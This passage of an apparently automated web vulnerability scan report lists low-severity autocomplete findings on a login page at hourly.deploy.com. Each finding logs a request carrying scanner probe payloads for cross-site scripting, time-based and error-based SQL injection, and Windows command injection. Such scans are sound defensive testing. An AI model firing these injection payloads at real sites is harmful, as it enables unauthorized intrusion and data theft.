Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n?%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.230. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%3Cscript%3Ens(0x000040)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3Cscript%3Ens(0x000040)%3C/script%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.231. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.232. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%3C/a%20style=x:expre/**/ssion(netsparker(0x000044))%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3C/a%20style=x:expre/**/ssion(netsparker(0x000044))%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.233. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.234. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.235. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=;ns:expression(netsparker(0x000049)); HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=;ns:expression(netsparker(0x000049));" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.236. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=javascript:netsparker(0x000037) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=javascript:netsparker(0x000037)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.237. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000009%2529%253C%252Fscript%253E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%2527%2522--%253e%253c%252fstyle%253e%253c%252fscript%253e%253cscript%253enetsparker%25280x000009%2529%253c%252fscript%253e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.238. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.239. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.240. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=;ns:expression(netsparker(0x000030)); HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:47 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:47 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=;ns:expression(netsparker(0x000030));" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.241. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?'"--></style></script><script>netsparker(0x00004F)</script> HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:01 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:01 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:01 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?'"--></style>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.242. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.243. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26%20SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.244. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='+OR+'1'%3d'1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='+OR+'1'%3d'1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.245. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27);WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27);WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.246. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1+AND+'NS%3d'ss HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1+AND+'NS%3d'ss" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.247. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
